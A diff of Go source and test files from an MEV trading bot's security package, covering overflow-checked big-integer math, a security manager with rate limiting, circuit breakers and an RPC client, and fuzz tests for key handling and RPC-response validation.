if result.Cmp(sm.MaxTransactionValue) > 0 {
return nil, fmt.Errorf("%w: sum exceeds max transaction value", ErrIntegerOverflow)
}
return result, nil
}
// SafeSubtract performs safe subtraction with underflow check
func (sm *SafeMath) SafeSubtract(a, b *big.Int) (*big.Int, error) {
if a == nil || b == nil {
return nil, fmt.Errorf("%w: nil operand", ErrInvalidConversion)
}
result := new(big.Int).Sub(a, b)
// Check for negative result (underflow)
if result.Sign() < 0 {
return nil, fmt.Errorf("%w: subtraction would result in negative value", ErrIntegerUnderflow)
}
return result, nil
}
// SafeMultiply performs safe multiplication with overflow check
func (sm *SafeMath) SafeMultiply(a, b *big.Int) (*big.Int, error) {
if a == nil || b == nil {
return nil, fmt.Errorf("%w: nil operand", ErrInvalidConversion)
}
// Check for zero to avoid unnecessary computation
if a.Sign() == 0 || b.Sign() == 0 {
return big.NewInt(0), nil
}
result := new(big.Int).Mul(a, b)
// Check against maximum transaction value
if result.Cmp(sm.MaxTransactionValue) > 0 {
return nil, fmt.Errorf("%w: product exceeds max transaction value", ErrIntegerOverflow)
}
return result, nil
}
// SafeDivide performs safe division with zero check
func (sm *SafeMath) SafeDivide(a, b *big.Int) (*big.Int, error) {
if a == nil || b == nil {
return nil, fmt.Errorf("%w: nil operand", ErrInvalidConversion)
}
if b.Sign() == 0 {
return nil, ErrDivisionByZero
}
return new(big.Int).Div(a, b), nil
}
// SafePercent calculates percentage safely (value * percent / 100)
func (sm *SafeMath) SafePercent(value *big.Int, percent uint64) (*big.Int, error) {
if value == nil {
return nil, fmt.Errorf("%w: nil value", ErrInvalidConversion)
}
if percent > 10000 { // Max 100.00% with 2 decimal precision
return nil, fmt.Errorf("%w: percent %d exceeds 10000 (100%%)", ErrIntegerOverflow, percent)
}
percentBig := big.NewInt(int64(percent))
hundred := big.NewInt(100)
temp := new(big.Int).Mul(value, percentBig)
result := new(big.Int).Div(temp, hundred)
return result, nil
}
// ValidateGasPrice ensures gas price is within safe bounds
func (sm *SafeMath) ValidateGasPrice(gasPrice *big.Int) error {
if gasPrice == nil {
return fmt.Errorf("gas price cannot be nil")
}
if gasPrice.Sign() < 0 {
return fmt.Errorf("gas price cannot be negative")
}
if gasPrice.Cmp(sm.MaxGasPrice) > 0 {
return fmt.Errorf("gas price %s exceeds maximum %s", gasPrice.String(), sm.MaxGasPrice.String())
}
return nil
}
// ValidateTransactionValue ensures transaction value is within safe bounds
func (sm *SafeMath) ValidateTransactionValue(value *big.Int) error {
if value == nil {
return fmt.Errorf("transaction value cannot be nil")
}
if value.Sign() < 0 {
return fmt.Errorf("transaction value cannot be negative")
}
if value.Cmp(sm.MaxTransactionValue) > 0 {
return fmt.Errorf("transaction value %s exceeds maximum %s", value.String(), sm.MaxTransactionValue.String())
}
return nil
}
// CalculateMinimumProfit calculates minimum profit required for a trade
func (sm *SafeMath) CalculateMinimumProfit(gasPrice, gasLimit *big.Int) (*big.Int, error) {
if err := sm.ValidateGasPrice(gasPrice); err != nil {
return nil, fmt.Errorf("invalid gas price: %w", err)
}
// Calculate gas cost
gasCost, err := sm.SafeMultiply(gasPrice, gasLimit)
if err != nil {
return nil, fmt.Errorf("failed to calculate gas cost: %w", err)
}
// Add 20% buffer for safety
buffer, err := sm.SafePercent(gasCost, 120)
if err != nil {
return nil, fmt.Errorf("failed to calculate buffer: %w", err)
}
return buffer, nil
}
// SafeSlippage calculates safe slippage amount
func (sm *SafeMath) SafeSlippage(amount *big.Int, slippageBps uint64) (*big.Int, error) {
if amount == nil {
return nil, fmt.Errorf("%w: nil amount", ErrInvalidConversion)
}
// Slippage in basis points (1 bp = 0.01%)
if slippageBps > 10000 { // Max 100%
return nil, fmt.Errorf("%w: slippage %d bps exceeds maximum", ErrIntegerOverflow, slippageBps)
}
// Calculate slippage amount
slippageAmount := new(big.Int).Mul(amount, big.NewInt(int64(slippageBps)))
slippageAmount.Div(slippageAmount, big.NewInt(10000))
// Calculate amount after slippage
result := new(big.Int).Sub(amount, slippageAmount)
if result.Sign() < 0 {
return nil, fmt.Errorf("%w: slippage exceeds amount", ErrIntegerUnderflow)
}
return result, nil
}

View File

@@ -0,0 +1,623 @@
package security
import (
"bytes"
"context"
"crypto/tls"
"encoding/json"
"errors"
"fmt"
"math/rand"
"net/http"
"os"
"reflect"
"sync"
"time"
"golang.org/x/time/rate"
"github.com/fraktal/mev-beta/internal/logger"
)
// SecurityManager provides centralized security management for the MEV bot
type SecurityManager struct {
keyManager *KeyManager
inputValidator *InputValidator
rateLimiter *RateLimiter
monitor *SecurityMonitor
config *SecurityConfig
logger *logger.Logger
// Circuit breakers for different components
rpcCircuitBreaker *CircuitBreaker
arbitrageCircuitBreaker *CircuitBreaker
// TLS configuration
tlsConfig *tls.Config
// Rate limiters for different operations
transactionLimiter *rate.Limiter
rpcLimiter *rate.Limiter
// Security state
emergencyMode bool
securityAlerts []SecurityAlert
alertsMutex sync.RWMutex
// Metrics
managerMetrics *ManagerMetrics
rpcHTTPClient *http.Client
}
// SecurityConfig contains all security-related configuration
type SecurityConfig struct {
// Key management
KeyStoreDir string `yaml:"keystore_dir"`
EncryptionEnabled bool `yaml:"encryption_enabled"`
// Rate limiting
TransactionRPS int `yaml:"transaction_rps"`
RPCRPS int `yaml:"rpc_rps"`
MaxBurstSize int `yaml:"max_burst_size"`
// Circuit breaker settings
FailureThreshold int `yaml:"failure_threshold"`
RecoveryTimeout time.Duration `yaml:"recovery_timeout"`
// TLS settings
TLSMinVersion uint16 `yaml:"tls_min_version"`
TLSCipherSuites []uint16 `yaml:"tls_cipher_suites"`
// Emergency settings
EmergencyStopFile string `yaml:"emergency_stop_file"`
MaxGasPrice string `yaml:"max_gas_price"`
// Monitoring
AlertWebhookURL string `yaml:"alert_webhook_url"`
LogLevel string `yaml:"log_level"`
// RPC endpoint used by secure RPC call delegation
RPCURL string `yaml:"rpc_url"`
}
// Additional security metrics for SecurityManager
type ManagerMetrics struct {
AuthenticationAttempts int64 `json:"authentication_attempts"`
FailedAuthentications int64 `json:"failed_authentications"`
CircuitBreakerTrips int64 `json:"circuit_breaker_trips"`
EmergencyStops int64 `json:"emergency_stops"`
TLSHandshakeFailures int64 `json:"tls_handshake_failures"`
}
// CircuitBreaker implements the circuit breaker pattern for fault tolerance
type CircuitBreaker struct {
name string
failureCount int
lastFailureTime time.Time
state CircuitBreakerState
config CircuitBreakerConfig
mutex sync.RWMutex
}
type CircuitBreakerState int
const (
CircuitBreakerClosed CircuitBreakerState = iota
CircuitBreakerOpen
CircuitBreakerHalfOpen
)
type CircuitBreakerConfig struct {
FailureThreshold int
RecoveryTimeout time.Duration
MaxRetries int
}
// NewSecurityManager creates a new security manager with comprehensive protection
func NewSecurityManager(config *SecurityConfig) (*SecurityManager, error) {
if config == nil {
return nil, fmt.Errorf("security config cannot be nil")
}
// Initialize key manager - get encryption key from environment or fail
encryptionKey := os.Getenv("MEV_BOT_ENCRYPTION_KEY")
if encryptionKey == "" {
return nil, fmt.Errorf("MEV_BOT_ENCRYPTION_KEY environment variable is required")
}
keyManagerConfig := &KeyManagerConfig{
KeyDir: config.KeyStoreDir,
KeystorePath: config.KeyStoreDir,
EncryptionKey: encryptionKey,
BackupEnabled: true,
MaxFailedAttempts: 3,
LockoutDuration: 5 * time.Minute,
}
keyManager, err := NewKeyManager(keyManagerConfig, logger.New("info", "json", "logs/keymanager.log"))
if err != nil {
return nil, fmt.Errorf("failed to initialize key manager: %w", err)
}
// Initialize input validator
inputValidator := NewInputValidator(1) // Default chain ID
// Initialize rate limiter
rateLimiterConfig := &RateLimiterConfig{
IPRequestsPerSecond: 100,
IPBurstSize: config.MaxBurstSize,
IPBlockDuration: 5 * time.Minute,
UserRequestsPerSecond: config.TransactionRPS,
UserBurstSize: config.MaxBurstSize,
UserBlockDuration: 5 * time.Minute,
CleanupInterval: 5 * time.Minute,
}
rateLimiter := NewRateLimiter(rateLimiterConfig)
// Initialize security monitor
monitorConfig := &MonitorConfig{
EnableAlerts: true,
AlertBuffer: 1000,
AlertRetention: 24 * time.Hour,
MaxEvents: 10000,
EventRetention: 7 * 24 * time.Hour,
MetricsInterval: time.Minute,
CleanupInterval: time.Hour,
}
monitor := NewSecurityMonitor(monitorConfig)
// Create TLS configuration with security best practices
tlsConfig := &tls.Config{
MinVersion: tls.VersionTLS12, // Enforce TLS 1.2 minimum
CipherSuites: config.TLSCipherSuites,
InsecureSkipVerify: false,
PreferServerCipherSuites: true,
}
// Initialize circuit breakers
rpcCircuitBreaker := &CircuitBreaker{
name: "rpc",
config: CircuitBreakerConfig{
FailureThreshold: config.FailureThreshold,
RecoveryTimeout: config.RecoveryTimeout,
MaxRetries: 3,
},
state: CircuitBreakerClosed,
}
arbitrageCircuitBreaker := &CircuitBreaker{
name: "arbitrage",
config: CircuitBreakerConfig{
FailureThreshold: config.FailureThreshold,
RecoveryTimeout: config.RecoveryTimeout,
MaxRetries: 3,
},
state: CircuitBreakerClosed,
}
// Initialize rate limiters
transactionLimiter := rate.NewLimiter(rate.Limit(config.TransactionRPS), config.MaxBurstSize)
rpcLimiter := rate.NewLimiter(rate.Limit(config.RPCRPS), config.MaxBurstSize)
// Create logger instance
securityLogger := logger.New("info", "json", "logs/security.log")
httpTransport := &http.Transport{
TLSClientConfig: tlsConfig,
}
sm := &SecurityManager{
keyManager: keyManager,
inputValidator: inputValidator,
rateLimiter: rateLimiter,
monitor: monitor,
config: config,
logger: securityLogger,
rpcCircuitBreaker: rpcCircuitBreaker,
arbitrageCircuitBreaker: arbitrageCircuitBreaker,
tlsConfig: tlsConfig,
transactionLimiter: transactionLimiter,
rpcLimiter: rpcLimiter,
emergencyMode: false,
securityAlerts: make([]SecurityAlert, 0),
managerMetrics: &ManagerMetrics{},
rpcHTTPClient: &http.Client{
Timeout: 30 * time.Second,
Transport: httpTransport,
},
}
// Start security monitoring
go sm.startSecurityMonitoring()
sm.logger.Info("Security manager initialized successfully")
return sm, nil
}
// GetKeyManager returns the KeyManager instance managed by SecurityManager
// SECURITY FIX: Provides single source of truth for KeyManager to prevent multiple instances
// with different encryption keys (which would cause key derivation mismatches)
func (sm *SecurityManager) GetKeyManager() *KeyManager {
return sm.keyManager
}
// ValidateTransaction performs comprehensive transaction validation
func (sm *SecurityManager) ValidateTransaction(ctx context.Context, txParams *TransactionParams) error {
// Check rate limiting
if !sm.transactionLimiter.Allow() {
if sm.monitor != nil {
sm.monitor.RecordEvent(EventTypeError, "security_manager", "Transaction rate limit exceeded", SeverityMedium, map[string]interface{}{
"limit_type": "transaction",
})
}
return fmt.Errorf("transaction rate limit exceeded")
}
// Check emergency mode
if sm.emergencyMode {
return fmt.Errorf("system in emergency mode - transactions disabled")
}
// Validate input parameters (simplified validation)
if txParams.To == nil {
return fmt.Errorf("transaction validation failed: missing recipient")
}
if txParams.Value == nil {
return fmt.Errorf("transaction validation failed: missing value")
}
// Check circuit breaker state
if sm.arbitrageCircuitBreaker.state == CircuitBreakerOpen {
return fmt.Errorf("arbitrage circuit breaker is open")
}
return nil
}
// SecureRPCCall performs RPC calls with security controls
func (sm *SecurityManager) SecureRPCCall(ctx context.Context, method string, params interface{}) (interface{}, error) {
// Check rate limiting
if !sm.rpcLimiter.Allow() {
if sm.monitor != nil {
sm.monitor.RecordEvent(EventTypeError, "security_manager", "RPC rate limit exceeded", SeverityMedium, map[string]interface{}{
"limit_type": "rpc",
"method": method,
})
}
return nil, fmt.Errorf("RPC rate limit exceeded")
}
// Check circuit breaker
if sm.rpcCircuitBreaker.state == CircuitBreakerOpen {
return nil, fmt.Errorf("RPC circuit breaker is open")
}
if sm.config.RPCURL == "" {
err := errors.New("RPC endpoint not configured in security manager")
sm.RecordFailure("rpc", err)
return nil, err
}
paramList, err := normalizeRPCParams(params)
if err != nil {
sm.RecordFailure("rpc", err)
return nil, err
}
requestPayload := jsonRPCRequest{
JSONRPC: "2.0",
Method: method,
Params: paramList,
ID: fmt.Sprintf("sm-%d", rand.Int63()),
}
body, err := json.Marshal(requestPayload)
if err != nil {
sm.RecordFailure("rpc", err)
return nil, fmt.Errorf("failed to marshal RPC request: %w", err)
}
req, err := http.NewRequestWithContext(ctx, http.MethodPost, sm.config.RPCURL, bytes.NewReader(body))
if err != nil {
sm.RecordFailure("rpc", err)
return nil, fmt.Errorf("failed to create RPC request: %w", err)
}
req.Header.Set("Content-Type", "application/json")
resp, err := sm.rpcHTTPClient.Do(req)
if err != nil {
sm.RecordFailure("rpc", err)
return nil, fmt.Errorf("RPC call failed: %w", err)
}
defer resp.Body.Close()
if resp.StatusCode >= 400 {
sm.RecordFailure("rpc", fmt.Errorf("rpc endpoint returned status %d", resp.StatusCode))
return nil, fmt.Errorf("rpc endpoint returned status %d", resp.StatusCode)
}
var rpcResp jsonRPCResponse
if err := json.NewDecoder(resp.Body).Decode(&rpcResp); err != nil {
sm.RecordFailure("rpc", err)
return nil, fmt.Errorf("failed to decode RPC response: %w", err)
}
if rpcResp.Error != nil {
err := fmt.Errorf("rpc error %d: %s", rpcResp.Error.Code, rpcResp.Error.Message)
sm.RecordFailure("rpc", err)
return nil, err
}
var result interface{}
if len(rpcResp.Result) > 0 {
if err := json.Unmarshal(rpcResp.Result, &result); err != nil {
// If we cannot unmarshal into interface{}, return raw JSON
result = string(rpcResp.Result)
}
}
sm.RecordSuccess("rpc")
return result, nil
}
// TriggerEmergencyStop activates emergency mode
func (sm *SecurityManager) TriggerEmergencyStop(reason string) error {
sm.emergencyMode = true
sm.managerMetrics.EmergencyStops++
alert := SecurityAlert{
ID: fmt.Sprintf("emergency-%d", time.Now().Unix()),
Timestamp: time.Now(),
Level: AlertLevelCritical,
Type: AlertTypeConfiguration,
Title: "Emergency Stop Activated",
Description: fmt.Sprintf("Emergency stop triggered: %s", reason),
Source: "security_manager",
Data: map[string]interface{}{
"reason": reason,
},
Actions: []string{"investigate_cause", "review_logs", "manual_restart_required"},
}
sm.addSecurityAlert(alert)
sm.logger.Error("Emergency stop triggered: " + reason)
return nil
}
// RecordFailure records a failure for circuit breaker logic
func (sm *SecurityManager) RecordFailure(component string, err error) {
var cb *CircuitBreaker
switch component {
case "rpc":
cb = sm.rpcCircuitBreaker
case "arbitrage":
cb = sm.arbitrageCircuitBreaker
default:
return
}
cb.mutex.Lock()
defer cb.mutex.Unlock()
cb.failureCount++
cb.lastFailureTime = time.Now()
if cb.failureCount >= cb.config.FailureThreshold && cb.state == CircuitBreakerClosed {
cb.state = CircuitBreakerOpen
sm.managerMetrics.CircuitBreakerTrips++
alert := SecurityAlert{
ID: fmt.Sprintf("circuit-breaker-%s-%d", component, time.Now().Unix()),
Timestamp: time.Now(),
Level: AlertLevelError,
Type: AlertTypePerformance,
Title: "Circuit Breaker Opened",
Description: fmt.Sprintf("Circuit breaker opened for component: %s", component),
Source: "security_manager",
Data: map[string]interface{}{
"component": component,
"failure_count": cb.failureCount,
"error": err.Error(),
},
Actions: []string{"investigate_failures", "check_component_health", "manual_intervention_required"},
}
sm.addSecurityAlert(alert)
sm.logger.Warn(fmt.Sprintf("Circuit breaker opened for component: %s, failure count: %d", component, cb.failureCount))
}
}
// RecordSuccess records a success for circuit breaker logic
func (sm *SecurityManager) RecordSuccess(component string) {
var cb *CircuitBreaker
switch component {
case "rpc":
cb = sm.rpcCircuitBreaker
case "arbitrage":
cb = sm.arbitrageCircuitBreaker
default:
return
}
cb.mutex.Lock()
defer cb.mutex.Unlock()
if cb.state == CircuitBreakerHalfOpen {
cb.state = CircuitBreakerClosed
cb.failureCount = 0
sm.logger.Info(fmt.Sprintf("Circuit breaker closed for component: %s", component))
}
}
// addSecurityAlert adds a security alert to the system
func (sm *SecurityManager) addSecurityAlert(alert SecurityAlert) {
sm.alertsMutex.Lock()
defer sm.alertsMutex.Unlock()
sm.securityAlerts = append(sm.securityAlerts, alert)
// Send alert to monitor if available
if sm.monitor != nil {
sm.monitor.TriggerAlert(alert.Level, alert.Type, alert.Title, alert.Description, alert.Source, alert.Data, alert.Actions)
}
// Keep only last 1000 alerts
if len(sm.securityAlerts) > 1000 {
sm.securityAlerts = sm.securityAlerts[len(sm.securityAlerts)-1000:]
}
}
// startSecurityMonitoring starts background security monitoring
func (sm *SecurityManager) startSecurityMonitoring() {
ticker := time.NewTicker(1 * time.Minute)
defer ticker.Stop()
for {
select {
case <-ticker.C:
sm.performSecurityChecks()
}
}
}
// performSecurityChecks performs periodic security checks
func (sm *SecurityManager) performSecurityChecks() {
// Check circuit breakers for recovery
sm.checkCircuitBreakerRecovery(sm.rpcCircuitBreaker)
sm.checkCircuitBreakerRecovery(sm.arbitrageCircuitBreaker)
// Check for emergency stop file
if sm.config.EmergencyStopFile != "" {
if _, err := os.Stat(sm.config.EmergencyStopFile); err == nil {
sm.TriggerEmergencyStop("emergency stop file detected")
}
}
}
// checkCircuitBreakerRecovery checks if circuit breakers can transition to half-open
func (sm *SecurityManager) checkCircuitBreakerRecovery(cb *CircuitBreaker) {
cb.mutex.Lock()
defer cb.mutex.Unlock()
if cb.state == CircuitBreakerOpen &&
time.Since(cb.lastFailureTime) > cb.config.RecoveryTimeout {
cb.state = CircuitBreakerHalfOpen
sm.logger.Info(fmt.Sprintf("Circuit breaker transitioned to half-open for component: %s", cb.name))
}
}
// GetManagerMetrics returns current manager metrics
func (sm *SecurityManager) GetManagerMetrics() *ManagerMetrics {
return sm.managerMetrics
}
// GetSecurityMetrics returns current security metrics from monitor
func (sm *SecurityManager) GetSecurityMetrics() *SecurityMetrics {
if sm.monitor != nil {
return sm.monitor.GetMetrics()
}
return &SecurityMetrics{}
}
// GetSecurityAlerts returns recent security alerts
func (sm *SecurityManager) GetSecurityAlerts(limit int) []SecurityAlert {
sm.alertsMutex.RLock()
defer sm.alertsMutex.RUnlock()
if limit <= 0 || limit > len(sm.securityAlerts) {
limit = len(sm.securityAlerts)
}
start := len(sm.securityAlerts) - limit
if start < 0 {
start = 0
}
alerts := make([]SecurityAlert, limit)
copy(alerts, sm.securityAlerts[start:])
return alerts
}
// Shutdown gracefully shuts down the security manager
func (sm *SecurityManager) Shutdown(ctx context.Context) error {
sm.logger.Info("Shutting down security manager")
// Shutdown components
if sm.keyManager != nil {
// Key manager shutdown - simplified (no shutdown method needed)
sm.logger.Info("Key manager stopped")
}
if sm.rateLimiter != nil {
// Rate limiter shutdown - simplified
sm.logger.Info("Rate limiter stopped")
}
if sm.monitor != nil {
// Monitor shutdown - simplified
sm.logger.Info("Security monitor stopped")
}
if sm.rpcHTTPClient != nil {
sm.rpcHTTPClient.CloseIdleConnections()
}
return nil
}
type jsonRPCRequest struct {
JSONRPC string `json:"jsonrpc"`
Method string `json:"method"`
Params []interface{} `json:"params"`
ID string `json:"id"`
}
type jsonRPCError struct {
Code int `json:"code"`
Message string `json:"message"`
}
type jsonRPCResponse struct {
JSONRPC string `json:"jsonrpc"`
Result json.RawMessage `json:"result"`
Error *jsonRPCError `json:"error,omitempty"`
ID string `json:"id"`
}
func normalizeRPCParams(params interface{}) ([]interface{}, error) {
if params == nil {
return []interface{}{}, nil
}
switch v := params.(type) {
case []interface{}:
return v, nil
case []string:
result := make([]interface{}, len(v))
for i := range v {
result[i] = v[i]
}
return result, nil
case []int:
result := make([]interface{}, len(v))
for i := range v {
result[i] = v[i]
}
return result, nil
}
val := reflect.ValueOf(params)
if val.Kind() == reflect.Slice || val.Kind() == reflect.Array {
length := val.Len()
result := make([]interface{}, length)
for i := 0; i < length; i++ {
result[i] = val.Index(i).Interface()
}
return result, nil
}
return []interface{}{params}, nil
}

View File

@@ -0,0 +1,416 @@
package security
import (
"encoding/json"
"fmt"
"math/big"
"strings"
"testing"
"time"
"github.com/ethereum/go-ethereum/common"
"github.com/ethereum/go-ethereum/core/types"
"github.com/fraktal/mev-beta/internal/logger"
)
// newTestLogger creates a simple test logger
func newTestLogger() *logger.Logger {
return logger.New("info", "text", "")
}
// FuzzRPCResponseParser tests RPC response parsing with malformed inputs
func FuzzRPCResponseParser(f *testing.F) {
// Add seed corpus with valid RPC responses
validResponses := []string{
`{"jsonrpc":"2.0","id":1,"result":"0x1"}`,
`{"jsonrpc":"2.0","id":2,"result":{"blockNumber":"0x1b4","hash":"0x..."}}`,
`{"jsonrpc":"2.0","id":3,"error":{"code":-32000,"message":"insufficient funds"}}`,
`{"jsonrpc":"2.0","id":4,"result":null}`,
`{"jsonrpc":"2.0","id":5,"result":[]}`,
}
for _, response := range validResponses {
f.Add([]byte(response))
}
f.Fuzz(func(t *testing.T, data []byte) {
// Test that RPC response parsing doesn't panic
defer func() {
if r := recover(); r != nil {
t.Errorf("Panic on RPC input: %v\nInput: %q", r, string(data))
}
}()
// Test JSON parsing
var result interface{}
_ = json.Unmarshal(data, &result)
// Test with InputValidator
validator := NewInputValidator(42161) // Arbitrum chain ID
_ = validator.ValidateRPCResponse(data)
})
}
// FuzzTransactionSigning tests transaction signing with various inputs
func FuzzTransactionSigning(f *testing.F) {
// Setup key manager for testing
config := &KeyManagerConfig{
KeystorePath: "test_keystore",
EncryptionKey: "test_encryption_key_for_fuzzing_32chars",
SessionTimeout: time.Hour,
AuditLogPath: "",
MaxSigningRate: 1000,
KeyRotationDays: 30,
}
testLogger := newTestLogger()
km, err := newKeyManagerForTesting(config, testLogger)
if err != nil {
f.Skip("Failed to create key manager for fuzzing")
}
// Generate test key
testKeyAddr, err := km.GenerateKey("test", KeyPermissions{
CanSign: true,
CanTransfer: true,
})
if err != nil {
f.Skip("Failed to generate test key")
}
// Seed corpus with valid transaction data
validTxData := [][]byte{
{0x02}, // EIP-1559 transaction type
{0x01}, // EIP-2930 transaction type
{0x00}, // Legacy transaction type
}
for _, data := range validTxData {
f.Add(data)
}
f.Fuzz(func(t *testing.T, data []byte) {
defer func() {
if r := recover(); r != nil {
t.Errorf("Panic in transaction signing: %v\nInput: %x", r, data)
}
}()
// Try to create transaction from fuzzed data
if len(data) == 0 {
return
}
// Create a basic transaction for signing tests
tx := types.NewTransaction(
0, // nonce
common.HexToAddress("0x1234"), // to
big.NewInt(1000000000000000000), // value (1 ETH)
21000, // gas limit
big.NewInt(20000000000), // gas price (20 gwei)
data, // data
)
// Test signing
request := &SigningRequest{
Transaction: tx,
From: testKeyAddr,
Purpose: "fuzz_test",
ChainID: big.NewInt(42161),
UrgencyLevel: 1,
}
_, _ = km.SignTransaction(request)
})
}
// FuzzKeyValidation tests key validation with various encryption keys
func FuzzKeyValidation(f *testing.F) {
// Seed with common weak keys
weakKeys := []string{
"test123",
"password",
"12345678901234567890123456789012",
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"test_encryption_key_default_config",
}
for _, key := range weakKeys {
f.Add(key)
}
f.Fuzz(func(t *testing.T, encryptionKey string) {
defer func() {
if r := recover(); r != nil {
t.Errorf("Panic in key validation: %v\nKey: %q", r, encryptionKey)
}
}()
config := &KeyManagerConfig{
EncryptionKey: encryptionKey,
KeystorePath: "test_keystore",
}
// This should not panic, even with invalid keys
err := validateProductionConfig(config)
// Check for expected security rejections
if strings.Contains(strings.ToLower(encryptionKey), "test") ||
strings.Contains(strings.ToLower(encryptionKey), "default") ||
len(encryptionKey) < 32 {
if err == nil {
t.Errorf("Expected validation error for weak key: %q", encryptionKey)
}
}
})
}
// FuzzInputValidator tests input validation with malicious inputs
func FuzzInputValidator(f *testing.F) {
validator := NewInputValidator(42161)
// Seed with various address formats
addresses := []string{
"0x1234567890123456789012345678901234567890",
"0x0000000000000000000000000000000000000000",
"0xffffffffffffffffffffffffffffffffffffffff",
"0x",
"",
"not_an_address",
}
for _, addr := range addresses {
f.Add(addr)
}
f.Fuzz(func(t *testing.T, addressStr string) {
defer func() {
if r := recover(); r != nil {
t.Errorf("Panic in address validation: %v\nAddress: %q", r, addressStr)
}
}()
// Test RPC response validation
rpcData := []byte(fmt.Sprintf(`{"jsonrpc":"2.0","id":1,"result":"%s"}`, addressStr))
_ = validator.ValidateRPCResponse(rpcData)
// Test amount validation if it looks like a number
if len(addressStr) > 0 && addressStr[0] >= '0' && addressStr[0] <= '9' {
amount := new(big.Int)
amount.SetString(addressStr, 10)
// Test basic amount validation logic
if amount.Sign() < 0 {
// Negative amounts should be rejected
}
}
})
}
// TestConcurrentKeyAccess tests concurrent access to key manager
func TestConcurrentKeyAccess(t *testing.T) {
config := &KeyManagerConfig{
KeystorePath: "test_concurrent_keystore",
EncryptionKey: "concurrent_test_encryption_key_32c",
SessionTimeout: time.Hour,
MaxSigningRate: 1000,
KeyRotationDays: 30,
}
testLogger := newTestLogger()
km, err := newKeyManagerForTesting(config, testLogger)
if err != nil {
t.Fatalf("Failed to create key manager: %v", err)
}
// Generate test key
testKeyAddr, err := km.GenerateKey("concurrent_test", KeyPermissions{
CanSign: true,
CanTransfer: true,
})
if err != nil {
t.Fatalf("Failed to generate test key: %v", err)
}
// Test concurrent signing
const numGoroutines = 100
const signingsPerGoroutine = 10
results := make(chan error, numGoroutines*signingsPerGoroutine)
for i := 0; i < numGoroutines; i++ {
go func(workerID int) {
for j := 0; j < signingsPerGoroutine; j++ {
tx := types.NewTransaction(
uint64(workerID*signingsPerGoroutine+j),
common.HexToAddress("0x1234"),
big.NewInt(1000000000000000000),
21000,
big.NewInt(20000000000),
[]byte(fmt.Sprintf("worker_%d_tx_%d", workerID, j)),
)
request := &SigningRequest{
Transaction: tx,
From: testKeyAddr,
Purpose: fmt.Sprintf("concurrent_test_%d_%d", workerID, j),
ChainID: big.NewInt(42161),
UrgencyLevel: 1,
}
_, err := km.SignTransaction(request)
results <- err
}
}(i)
}
// Collect results
for i := 0; i < numGoroutines*signingsPerGoroutine; i++ {
if err := <-results; err != nil {
t.Errorf("Concurrent signing failed: %v", err)
}
}
}
// TestSecurityMetrics tests security metrics collection
func TestSecurityMetrics(t *testing.T) {
validator := NewInputValidator(42161)
// Test metrics for various validation scenarios
testCases := []struct {
name string
testFunc func() error
expectError bool
}{
{
name: "valid_rpc_response",
testFunc: func() error {
return validator.ValidateRPCResponse([]byte(`{"jsonrpc":"2.0","id":1,"result":"0x1"}`))
},
expectError: false,
},
{
name: "invalid_rpc_response",
testFunc: func() error {
return validator.ValidateRPCResponse([]byte(`invalid json`))
},
expectError: true,
},
{
name: "empty_rpc_response",
testFunc: func() error {
return validator.ValidateRPCResponse([]byte{})
},
expectError: true,
},
{
name: "oversized_rpc_response",
testFunc: func() error {
largeData := make([]byte, 11*1024*1024) // 11MB
return validator.ValidateRPCResponse(largeData)
},
expectError: true,
},
}
for _, tc := range testCases {
t.Run(tc.name, func(t *testing.T) {
err := tc.testFunc()
if tc.expectError && err == nil {
t.Errorf("Expected error for %s, but got none", tc.name)
}
if !tc.expectError && err != nil {
t.Errorf("Unexpected error for %s: %v", tc.name, err)
}
})
}
}
// BenchmarkSecurityOperations benchmarks critical security operations
func BenchmarkSecurityOperations(b *testing.B) {
config := &KeyManagerConfig{
KeystorePath: "benchmark_keystore",
EncryptionKey: "benchmark_encryption_key_32chars",
SessionTimeout: time.Hour,
MaxSigningRate: 10000,
KeyRotationDays: 30,
}
testLogger := newTestLogger()
km, err := newKeyManagerForTesting(config, testLogger)
if err != nil {
b.Fatalf("Failed to create key manager: %v", err)
}
testKeyAddr, err := km.GenerateKey("benchmark_test", KeyPermissions{
CanSign: true,
CanTransfer: true,
})
if err != nil {
b.Fatalf("Failed to generate test key: %v", err)
}
tx := types.NewTransaction(
0,
common.HexToAddress("0x1234"),
big.NewInt(1000000000000000000),
21000,
big.NewInt(20000000000),
[]byte("benchmark_data"),
)
b.Run("SignTransaction", func(b *testing.B) {
for i := 0; i < b.N; i++ {
request := &SigningRequest{
Transaction: tx,
From: testKeyAddr,
Purpose: fmt.Sprintf("benchmark_%d", i),
ChainID: big.NewInt(42161),
UrgencyLevel: 1,
}
_, err := km.SignTransaction(request)
if err != nil {
b.Fatalf("Signing failed: %v", err)
}
}
})
validator := NewInputValidator(42161)
b.Run("ValidateRPCResponse", func(b *testing.B) {
testData := []byte(`{"jsonrpc":"2.0","id":1,"result":"0x1"}`)
for i := 0; i < b.N; i++ {
_ = validator.ValidateRPCResponse(testData)
}
})
}
// Additional helper for RPC response validation
func (iv *InputValidator) ValidateRPCResponse(data []byte) error {
if len(data) == 0 {
return fmt.Errorf("empty RPC response")
}
if len(data) > 10*1024*1024 { // 10MB limit
return fmt.Errorf("RPC response too large: %d bytes", len(data))
}
// Check for valid JSON
var result interface{}
if err := json.Unmarshal(data, &result); err != nil {
return fmt.Errorf("invalid JSON in RPC response: %w", err)
}
// Check for common RPC response structure
if resultMap, ok := result.(map[string]interface{}); ok {
if jsonrpc, exists := resultMap["jsonrpc"]; exists {
if jsonrpcStr, ok := jsonrpc.(string); !ok || jsonrpcStr != "2.0" {
return fmt.Errorf("invalid JSON-RPC version")
}
}
}
return nil
}

View File

@@ -0,0 +1,435 @@
package security
import (
"context"
"fmt"
"math/big"
"time"
"github.com/ethereum/go-ethereum/common"
"github.com/ethereum/go-ethereum/core/types"
"github.com/ethereum/go-ethereum/ethclient"
"github.com/fraktal/mev-beta/internal/logger"
)
// TransactionSecurity provides comprehensive transaction security checks
type TransactionSecurity struct {
logger *logger.Logger
inputValidator *InputValidator
safeMath *SafeMath
client *ethclient.Client
chainID uint64
// Security thresholds
maxTransactionValue *big.Int
maxGasPrice *big.Int
maxSlippageBps uint64
// Blacklisted addresses
blacklistedAddresses map[common.Address]bool
// Rate limiting per address
transactionCounts map[common.Address]int
lastReset time.Time
maxTxPerAddress int
}
// TransactionSecurityResult contains the security analysis result
type TransactionSecurityResult struct {
Approved bool `json:"approved"`
RiskLevel string `json:"risk_level"` // LOW, MEDIUM, HIGH, CRITICAL
SecurityChecks map[string]bool `json:"security_checks"`
Warnings []string `json:"warnings"`
